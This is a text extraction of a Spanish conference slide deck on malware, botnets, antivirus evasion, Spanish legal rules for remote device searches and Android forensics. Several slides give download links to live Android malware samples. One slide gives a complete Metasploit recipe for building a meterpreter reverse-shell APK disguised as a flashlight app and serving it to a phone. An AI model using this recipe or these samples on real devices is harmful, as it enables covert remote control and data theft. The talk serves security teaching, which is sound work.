feel free - upmapolo.eui.upm.es/descarga/conferenciajuanantoniocallestassi201… · a) los...
TRANSCRIPT
![Page 1: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/1.jpg)
0
FEELFREEA NEW APPROACHTO CYBER SECURITY
![Page 2: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/2.jpg)
1
Big4Fundada en 1917
Más de 174.000 empleadosServicios de auditoría, fiscales y de asesoramiento legal,
financiero y de negocio
![Page 3: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/3.jpg)
2
![Page 4: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/4.jpg)
3
Ayudando a los clientes a detectar y responder los Ciber incidentes,
entendiendo las amenazas a su negocio, sus vulnerabilidades y
riesgos.
Ayudando a los clientes a construir y mejorar su
Ciberseguridad, soportada por las
personas, organización y tecnologías adecuadas.
Ayudando a los clientes a permanecer seguros en todo su negocio y
evolucionando y madurando sus
programas tecnológicos.
La aproximación a los servicios de seguridad se ha diseñado para ser simple y
efectiva –alineada a las necesidades de nuestros clientes resolviendo sus servicios
de seguridad, siguiendo el modelo de Buscar / Resolver / Operar.
CUTTING THROUGH SECURITY COMPLEXITY
![Page 5: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/5.jpg)
4
![Page 6: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/6.jpg)
5
• Proviene del inglés, malicious software
• Su objetivo (principal) es dañar un equipo informático oinfiltrarse para recuperar información del mismo, sin elconsentimiento de su propietario.
• La ausencia de dicho consentimiento no determina deforma inherente que su objetivo sea malicioso
• MDM, control parental, troyano policial, …
![Page 7: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/7.jpg)
6
publicidad en equipos infectados puerta trasera backdoor+spyware (espionaje) deniega un sistema replicando procesos red zombie específico para delitos financieros cifra sistema y pide rescate (ransom) acceden a sitios con contenido de pago bromas
![Page 8: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/8.jpg)
7
capturas de pulsaciones de ratón y teclado malware descargado de páginas porno diseñado para robo de correos y credenciales se ocultan en procesos suplantar Hosts y redirigir a páginas premium suplantación de identidad en web/email acceden a sitios porno de pago software con vulnerabilidades conocidas simula malware falso
![Page 9: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/9.jpg)
8
oculta información en un sistema
similar rogue, causar pánico para cobrar
correo basura
robo de información
control remoto sobre sistema
altera el funcionamiento de un sistema. Infectan normalmente
archivos
altera un sistema para dañarlo. Reside memoria
![Page 10: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/10.jpg)
9
Comienzo en los
Crecimiento lento en los 70-80
En los el problema a explotado a nivelmundial gracias al crecimiento exponencial de las líneasde Internet.
![Page 11: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/11.jpg)
10
En 1960 el DEC PDP-1 creó el “cinescopio”, el primer monitor para un ordenador.
Este invento inspiró a los primeros “hackers”,, de los laboratorios Bell, a programar el primer
videojuego “ ”, al que denominaron “Darwin”.
Consistía encompartida para destruir al
enemigo (como si de un gusano se tratase).
![Page 12: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/12.jpg)
11
•Darwin
•Creeper•Rabbit•Animal-Pervade•Worm
•Elk cloner•Viernes 13•Jerusalén
•Dark Avenger•VCL•Phalcon/Skism
Mass-ProducedCode Generator
•Michelangelo•Concept•Lady Di•Laroux•AccessiV•Melissa•Happy99•I-
Worm.ExploreZip
•VBSWG•ILOVEYOU•Pirus•Ramen•Lion•BadTrans•CodeRed•Spida•Benjamin•Slammer•Blaster•Agobot•Mydoom•Brador•Stardust•Staroffice•Leap•Conficker•Stuxnet•Zeus
•Duqu•Flame/
Skywiper•Sirefef/
ZeroAccess•Reveton•Dorkbot•RedOctober•Cryptolocker•Torrentlocker•CBLocker•Careto/ Mask•CryptoJoker
![Page 13: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/13.jpg)
12
![Page 14: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/14.jpg)
13
Conjunto de equipos conectados a una red como Internet, queinteractúan entre sí para ejecutar tareas de manera distribuida
Controlados desde uno o varios paneles de control quecoordinan las acciones que deben realizar.
Realización de ataques de denegación de servicio, robo deinformación de los usuarios con fines delictivos.
Sin embargo también son muchos los usos legítimos con los quecuentan las botnets (Boinc, Seti@Home, Distribuited.net, etc.).
¿Qué es?
![Page 15: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/15.jpg)
14
Bot
Botmaster
Zombie
Panel de control
Componentes
Dame instrucciones
Toma instrucciones
![Page 16: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/16.jpg)
15
Bredolab: 30 millones de equipos infectados
Mariposa: 12,7 millones de infectados.
Conficker: 10,5 millones de equipos infectados
TDL4: 4,5 millones de equipos infectados
Zeus: 3,6 millones de equipos infectados.
Más grandes de la historia
![Page 17: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/17.jpg)
16
Tipos
![Page 18: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/18.jpg)
17
1. Selección de objetivos
2. Proceso de infección
3. Propagación de la botnet
Fases
![Page 19: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/19.jpg)
18
1. Modificación de instrucciones
2. Ofuscación y cifrado
3. Oligorfismo, polimorfismo y metamorfismo
4. Distribución y cifrado de cadenas
5. Inyección dinámica de instrucciones
6. Etc.
Técnicas de evasión principales
![Page 20: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/20.jpg)
19
Modificación directa de instrucciones sobre el códigofuente del malware
Puede que no tengamos el código fuente
Sin código fuente, habría que hacer ingeniería inversa(mucho trabajo)
Modificación de instrucciones
![Page 21: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/21.jpg)
20
Ocultar el flujo de control y las estructuras de datos quecontienen información detectable del malware
Objetivo de los crypters: http://www.crypters.org
Son validos durante unos días, porque las empresas antivirusanalizan de forma habitual los foros de malware, con el fin dedescargarse los nuevos ejemplares y así poder agregar lasnuevas firmas a sus motores antivirus.
Ofuscación y cifrado
![Page 22: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/22.jpg)
21
: cuentan con sistemas de cifrado/descifrado paramejorar su ocultación (sin usar crypters).
: evolución en la que añaden la capacidad de generar deforma ilimitada nuevos cifradores y descifradores.
, es capaz de mutar su propio código entero, añadiendoinstrucciones de tipo “jump” o salto, como si de un crypter se tratase.
Oligorfismo, polimorfismo y metamorfismo
![Page 23: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/23.jpg)
22
Las casas de antivirus, suelen buscar en los malware ciertascadenas que son muy significativas
Es habitual que las firmas de detección se apliquen sobre estosstrings
Se basa en codificar y cifrar todas las cadenas de texto, y de serposible, sean divididas en trozos y unidas por el malware una vezse encuentre en funcionamiento.
Distribución y cifrado de cadenas
![Page 24: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/24.jpg)
23
El malware no aloja en su código las instrucciones más delicadas
Las instrucciones son almacenadas en otros archivos alojados enel equipo o incluso en Internet, y en tiempo de ejecución sonaccedidos y cargados en memoria
Ejemplo: función GetProcAddress() de C, obtener la dirección dememoria donde se encuentran cargadas las funciones del códigomalicioso y ejecutarlo.
Inyección dinámica de instrucciones
![Page 25: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/25.jpg)
24
1. Delincuencia
2. MDM
3. Control parental
4. Troyano policial
5. Hobby y aprendizaje
6. Etc.
¿Malo? ¿Bueno? Mejor llamarlo Legal vs Ilegal
![Page 26: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/26.jpg)
25
<<CAPITULO IX
Registros remotos sobre equipos informáticos
Articulo 588 septies a. Presupuestos.
1. El juez competente podrá autorizar la utilización de datos de identificación y códigos,
así como la instalación de un software, que permitan, de forma remota y telemática, el
examen a distancia y sin conocimiento de su titular o usuario del contenido de un
ordenador, dispositivo electrónico, sistema informático, instrumento de almacenamiento
masivo de datos informáticos o base de datos, siempre que persiga la investigación de
alguno de los siguientes delitos:
a) Delitos cometidos en el seno de organizaciones criminales.
b) Delitos de terrorismo.
c) Delitos cometidos contra menores o personas con capacidad modificada judicialmente.
d) Delitos contra la Constitución, de traición y relativos a la defensa nacional.
e) Delitos cometidos a través de instrumentos informáticos o de cualquier otra tecnología
de la información o la telecomunicación o servicio de comunicación.
Ley Orgánica 13/2015, de 5 de octubre de 2015, de modificación de la Ley de
Enjuiciamiento Criminal para el fortalecimiento de las garantías procesales y la
regulación de las medidas de investigación tecnológicas
![Page 27: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/27.jpg)
26
2. La resolución judicial que autorice el registro deberá especificar:
a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos,
medios informáticos de almacenamiento de datos o bases de datos, datos u otros contenidos
digitales objeto de la medida.
b) El alcance de la misma, la forma en la que se procederá al acceso y aprehensión de los
datos o archivos informáticos relevantes para la causa y el software mediante el que se
ejecutara el control de la información.
c) Los agentes autorizados para la ejecución de la medida.
d) La autorización, en su caso, para la realización y conservación de copias de los datos
informáticos.
e) Las medidas precisas para la preservación de la integridad de los datos almacenados, así
como para la inaccesibilidad o supresión de dichos datos del sistema informático al que se ha
tenido acceso.
3. Cuando los agentes que lleven a cabo el registro remoto tengan razones para creer que
los datos buscados están almacenados en otro sistema informático o en una parte del
mismo, pondrán este hecho en conocimiento del juez, quien podrá autorizar una
ampliación de los términos del registro. >>
![Page 28: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/28.jpg)
27
XNSpy
Droidjack (Sandrorat)
![Page 29: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/29.jpg)
28
![Page 31: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/31.jpg)
30
![Page 33: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/33.jpg)
32
Flappy Birds
NotCompatible
Android Locker Qqmagic
Android Proxy Trojan Xoryp
![Page 34: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/34.jpg)
33
Objetivo: enviar y recibir mensajes de texto con el fin de acumular
cargos por mensajería a números de tarificación adicional.
Muestra:
http://mfile.me/upload/bookmark/2014/0208/choingaygame/1391
825505/flappy-bird.apk
Código SMS:
Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
called from Lcom/hdc/ultilities/SendSMS$1;->run()V
Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
Landroid/app/PendingIntent;)V called from Lcom/hdc/ultilities/SendSMS$1;-
>run()V
![Page 35: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/35.jpg)
34
send SMS messages android.permission.READ_EXTERNAL_STORAGE (read from external storage) android.permission.RECEIVE_BOOT_COMPLETED (automatically start at boot) android.permission.READ_PHONE_STATE (read phone state and identity) android.permission.SYSTEM_ALERT_WINDOW (display system-level alerts) android.permission.ACCESS_WIFI_STATE (view Wi-Fi status) android.permission.WAKE_LOCK (prevent phone from sleeping) android.permission.GET_TASKS (retrieve running applications) android.permission.VIBRATE (control vibrator) android.permission.ACCESS_NETWORK_STATE (view network status) android.permission.INTERNET (full Internet access) android.permission.WRITE_EXTERNAL_STORAGE (modify/delete SD card contents) receive SMS)
¿¿PARA QUE QUIERE UN VIDEOJUEGO ENVIAR SMS??
![Page 36: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/36.jpg)
35
Troyano clásico de tipo actualización: no solicita los permisos en
la primera instalación, sino en una actualización.
Los datos de conexión se encuentran en data.bin dentro del directorio
“/data/data/com.Security.Update/files/“, y su contenido se
encuentra cifrado, con AES-ECB y una clave prefijada en la variable
passkey “ZTY4MGE5YQo”.
Nombre: com.security.update
Muestra:
http://www.mediafire.com/download/sjra9tzd14babma/Notcompati
bleC_FEACE958B47C2249C6AB8DDF804CDCB6_com.security.pat
ch.zip
![Page 37: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/37.jpg)
36
RECEIVE_BOOT_COMPLETED (automatically start at boot)
INTERNET (full Internet access)
ACCESS_NETWORK_STATE (viewnetwork status)
![Page 38: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/38.jpg)
37
Tipo: ransomware clásico.
Cifra y pide rescate
Muestra:
http://www.mediafire.com/do
wnload/1v8c3t94xw5j81b/An
droid-Locker-qqmagic-
735B4E78B334F6B9EB19E70
0A4C30966.zip
![Page 39: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/39.jpg)
38
android.permission.SEND_SMS (send SMS messages) android.permission.RECEIVE_BOOT_COMPLETED (automatically
start at boot) android.permission.SYSTEM_ALERT_WINDOW (display system-
level alerts) android.permission.ACCESS_NETWORK_STATE (view network
status) android.permission.RECEIVE_SMS (receive SMS) android.permission.INTERNET (full Internet access)
![Page 40: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/40.jpg)
39
Detección: 9 de abril de 2013
Troyano clásico: mensajes, registro de llamadas, historial
de navegación, ubicación GPS, SMS, Wi-Fi/3G, IMEI,
cuentas del usuario, etc.
Nombre: com.studio.proxy.apk
Muestra:
http://www.mediafire.com/download/n26zjz8rb7p2z4l/co
m.studio.proxy_D05D3F579295CD5018318072ADF3B83
D-samp.zip
![Page 41: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/41.jpg)
40
android.permission.CHANGE_NETWORK_STATE (change network connectivity) android.permission.SEND_SMS (send SMS messages) android.permission.DISABLE_KEYGUARD (disable key lock) android.permission.READ_PHONE_STATE (read phone state and identity) android.permission.ACCESS_WIFI_STATE (view Wi-Fi status) android.permission.ACCESS_COARSE_LOCATION (coarse (network-based) location) android.permission.WAKE_LOCK (prevent phone from sleeping) android.permission.RECEIVE_SMS (receive SMS) android.permission.INTERNET (full Internet access) android.permission.ACCESS_NETWORK_STATE (view network status) android.permission.WRITE_EXTERNAL_STORAGE (modify/delete SD card contents) android.permission.READ_CONTACTS (read contact data) android.permission.GET_ACCOUNTS (discover known accounts) android.permission.READ_SMS (read SMS or MMS)
![Page 42: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/42.jpg)
41
![Page 43: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/43.jpg)
42
1. msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk
2. service apache2 start3. cp /root/linterna.apk /var/www/html4. msfconsole5. use exploit/multi/handler6. set payload android/meterpreter/reverse_tcp7. set LHOST 192.168.1.508. set LPORT 44449. exploit
10. Abrir http://192.168.1.50/linterna.apk en el smartphone
![Page 44: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/44.jpg)
43
![Page 45: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/45.jpg)
44
![Page 46: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/46.jpg)
45
![Page 47: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/47.jpg)
46
![Page 48: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/48.jpg)
47
¿Qué ha ocurrido? ¿dónde? ¿cuándo?
¿cómo? ¿por qué?
![Page 49: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/49.jpg)
48
•
•
•
•
•
![Page 50: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/50.jpg)
49
ADB
DD
FTK Imager WForensic
Super OneClick
![Page 51: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/51.jpg)
50
• Preservar las evidencias
• Obtener información del dispositivo
•
•
•
•
• Adquirir información de la tarjeta SIM
• Informe
![Page 52: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/52.jpg)
51
![Page 53: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/53.jpg)
52
•• Marca, modelo y proveedor de servicio
• http://www.phonescoop.com/phones/finder.php
•• Interfaz de dispositivo
• Etiquetas
• Series
• Hora del móvil
• Software de sincronización
![Page 54: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/54.jpg)
53
•
•
•
•
![Page 55: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/55.jpg)
54
![Page 56: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/56.jpg)
55
![Page 57: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/57.jpg)
56
1. Instalar el SDK de Android en un PC2. Conectar el móvil al PC mediante ADB3. Rootear (al menos temporalmente) el móvil con Android4. Clonar mediante dd las particiones del móvil
1. Adquirir un producto de análisis forense automático
![Page 58: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/58.jpg)
57
![Page 59: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/59.jpg)
58
![Page 60: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/60.jpg)
59
